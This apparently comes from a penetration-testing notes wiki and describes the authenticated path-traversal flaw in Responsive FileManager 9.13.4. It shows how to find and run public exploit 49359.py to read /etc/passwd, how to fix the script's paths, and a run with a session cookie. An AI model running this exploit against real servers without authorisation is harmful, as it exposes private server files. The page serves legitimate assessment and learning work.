search

Responsive Filemanager

Responsive FileManager is a web-based file management plugin designed to integrate with rich text editors like TinyMCE or CKEditor. It provides an interface for uploading, browsing, renaming, and managing files and directories on the server through a browser. This tool is commonly used in content management systems (CMS) and custom web applications to allow users or administrators to handle media assets and documents. When improperly configured or left unpatched, it can expose sensitive file operations directly to the web, making it a potential attack surface during a web application assessment.

hashtag
LFI

Version 9.13.4 and earlier has improper input validation on the path parameter. This allows attackers with a valid session (authenticated access) to perform directory traversal by injecting relative path sequences such as ../../.., effectively escaping the intended file browsing directory and accessing arbitrary files on the server. 

$ searchsploit responsive file manager 9.13.4
Responsive FileManager 9.13.4 - 'path' Path Traversal | php/webapps/49359.py

$ python3 49359.py http://<target-IP>/filemanager PHPSESSID=<value> /etc/passwd
[*] Copy Clipboard
[-] Paste False
UnboundLocalError: cannot access local variable 'paste_result' where it is not associated with a value

# Check the paths on the below functions
def paste_clipboard(url, session_cookie):
        # Changed path
        url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)

def read_file(url, file_name):
        # Changed path
        url_path = "%s/filemanager/Documents/%s" % (url,name_file)
        
# Successful execution of the PoC will copy the target file within Documents (can be seen on the UI or in an SMB share in case of a PHP file
$ python3 49359.py http://apex PHPSESSID=vk5ofpj43e0ph77modoki4uo1s /etc/passwd
PreviousrConfigNextSimplePHPGal

Last updated